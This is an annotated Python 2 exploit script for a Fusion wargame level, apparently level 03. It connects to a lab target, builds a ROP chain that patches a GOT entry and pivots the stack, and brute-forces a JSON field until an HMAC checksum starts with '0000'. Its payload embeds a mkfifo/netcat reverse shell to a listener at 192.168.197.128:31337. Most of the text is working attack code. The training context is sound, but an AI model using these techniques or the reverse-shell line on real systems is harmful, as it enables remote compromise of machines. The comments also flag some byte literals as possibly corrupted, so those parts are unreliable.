# Exploit script for an exploit-exercises "Fusion" wargame level (the page's
# category list suggests level 03; the script itself does not say).  Python 2
# code: print statements, raw_input, list-returning range() joined with '+',
# and str-typed raw payload bytes passed straight into hmac and socket calls.
#
# Flow, as written:
#   1. connect to the target and read the token the service sends first;
#   2. build a ROP chain with struct.pack('<L', ...);
#   3. wrap it in a JSON message and vary four characters of "title" until
#      HMAC-SHA1(key=token, msg=token + "\n" + json) starts with "0000";
#   4. send token + "\n" + json and close the socket.
# Every address below is specific to the author's target binary and VM
# (target 192.168.197.130:20003, listener 192.168.197.128:31337); nothing is
# re-derived at run time.
from socket import *
from struct import *
import hmac
from hashlib import sha1

# Author's notes: where specific byte values can be found in the target's
# memory.  These addresses reappear as memcpy sources in the ROP chain below.
# NOTE(review): the "8f" entry says 804bda4+1, but the chain copies from
# 0x804bbb4+1 — one of the two looks stale; confirm against the binary.
# contents: 0x804bdf4
# 0804: 0x8048584+7
# 8f: 804bda4+1
# 30: 80482a4

rand_plt = 0x08048f30       # never referenced directly below (see the memcpy stage)
rand_got = 0x804bd98        # GOT slot; ebx is derived from it so the add gadget lands on it
memcpy = 0x8048e60          # memcpy entry, called four times by the chain
gContents = 0x804bdf4       # same value as the "contents" note; memcpy destinations are relative to it
ppppr = 0x804a26c           # from the name, a pop;pop;pop;pop;ret gadget; +1/+3 are used below, presumably to skip leading pops — confirm
pop_ebx = 0x8049402 # pop ebx ; pop ebp ;;
pop_eax = 0x8049b4f # pop eax ; add esp 0x5c ;;
add_eax_ebx = 0x80493f9 # add eax 0x804bde4 ; add [ebx+0x5d5b04c4] eax ;;
leave_ret = 0x8049431 # leave;;

s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20003))
raw_input('go?')                # blocks until Enter; presumably a pause to attach a debugger — confirm
get=s.recv(1024).rstrip()
token = get[1:len(get)-1]       # drops the first and last character of what the service sent; the framing is not visible here
print token

cmd = "id\x00"                  # unused: nothing below references it
payload = ""
# Stage 1 of the chain: ebx is chosen so that ebx + 0x5d5b04c4 == rand_got
# (the & 0xFFFFFFFF keeps the wrapped subtraction in 32 bits).  eax is loaded
# with 0xf7fbd6cc and the 0x5c bytes of filler are consumed by the gadget's
# "add esp 0x5c".  add_eax_ebx then does eax += 0x804bde4 (0xf7fbd6cc +
# 0x804bde4 wraps to 0x94b0, as the author's comment says) and adds eax into
# [ebx+0x5d5b04c4], i.e. adds 0x94b0 to the GOT entry at rand_got.  Which
# function that slot ends up pointing at is not stated in this script.
payload += pack('<L',pop_ebx)
payload += pack('<L',(rand_got - 0x5d5b04c4)&0xFFFFFFFF) # ebx
payload += "AAAA" # ebp
payload += pack('<L',pop_eax)
payload += pack('<L',0xf7fbd6cc)
payload += "A"*(0x5c)
payload += pack('<L',add_eax_ebx) # eax = 0x94b0
# Stage 2: four memcpy calls, each framed as
#   memcpy, return-to ppppr+1, dst, src, len.
# Destinations are gContents-5 .. gContents-8, one byte apart; the sources are
# the addresses from the header notes.  If those notes are right, the bytes
# landing at gContents-8..-5 read 30 8f 04 08, i.e. rand_plt (0x08048f30) in
# little-endian — the value appears to be assembled in place byte by byte.
# The len argument is the JSON escape "\u0100\u0000", left for the target's
# JSON parser to decode; how that parser encodes it is not visible here.
# NOTE(review): the literals read "\\\\u0100\\\\u0000" on this page, which is
# two backslashes in the resulting Python str — that may be a doubling
# introduced by the page's rendering (likewise "\\\\u0030" in the title);
# verify against the original script before relying on these bytes.
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-5)
payload += pack('<L',0x8048584+7)
payload += "\\\\u0100\\\\u0000"
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-6)
payload += pack('<L',0x8048584+8)
payload += "\\\\u0100\\\\u0000"
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-7)
payload += pack('<L',0x804bbb4+1)
payload += "\\\\u0100\\\\u0000"
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-8)
payload += pack('<L',0x80482a4)
payload += "\\\\u0100\\\\u0000"
# Stage 3: ppppr+3 (per the author's "# ebp", the remaining pop is pop ebp)
# loads ebp with gContents-12; leave;ret (mov esp,ebp ; pop ebp ; ret) then
# moves the stack there and returns through the dword at gContents-8 — the
# value assembled by the memcpy calls above.
payload += pack('<L',ppppr+3)
payload += pack('<L', gContents-12) # ebp
payload += pack('<L',leave_ret)

# Candidate characters for the four-byte "title" prefix: a-z, A-Z, 0-9.
# (Python 2: range() returns lists, so '+' concatenates them.)
lists = range(ord('a'),ord('z')+1)+range(ord('A'),ord('Z')+1)+range(ord('0'),ord('9')+1)
breakall=0      # set once a match is found, then checked at each loop level to unwind all four loops
for i in lists:
    for j in lists:
        for k in lists:
            for l in lists:
                trys = chr(i)+chr(j)+chr(k)+chr(l)
                print trys
                # The full message.  "contents" is the command the target will
                # run (a named-pipe reverse shell to 192.168.197.128:31337);
                # "title" is trys + 123 'A' + JSON-escaped "\u0030" + 31 'A' +
                # the raw ROP chain; "serverip" names the same listener.
                # NOTE: this local name shadows the stdlib module name "json".
                json = '{"contents":"mkfifo /tmp/tunz; nc 192.168.197.128 31337 0< /tmp/tunz | /bin/sh 1> /tmp/tunz;", "title":"'+trys+"A"*123+"\\\\u0030"+"A"*31+payload+'", "serverip":"192.168.197.128:31337"}'
                # HMAC-SHA1 keyed with the token over token + "\n" + json —
                # the same bytes that are sent at the end.
                checksum = hmac.new(token,token+"\n"+json,sha1).hexdigest()
                print checksum
                # Presumably the service only accepts a message whose checksum
                # starts with "0000" (a 16-bit proof of work); keep varying the
                # title prefix until that holds — confirm against the level.
                if checksum[0:4] == "0000":
                    breakall=1
                    break
            if breakall==1:
                break
        if breakall==1:
            break
    if breakall==1:
        break

# NOTE(review): json and checksum are whatever the last iteration produced;
# if no candidate matched, the loops simply run out and the last, unmatched
# message is still sent.
print "Send: "+token+"\n"+json
print checksum
s.send(token+"\n"+json)
s.close()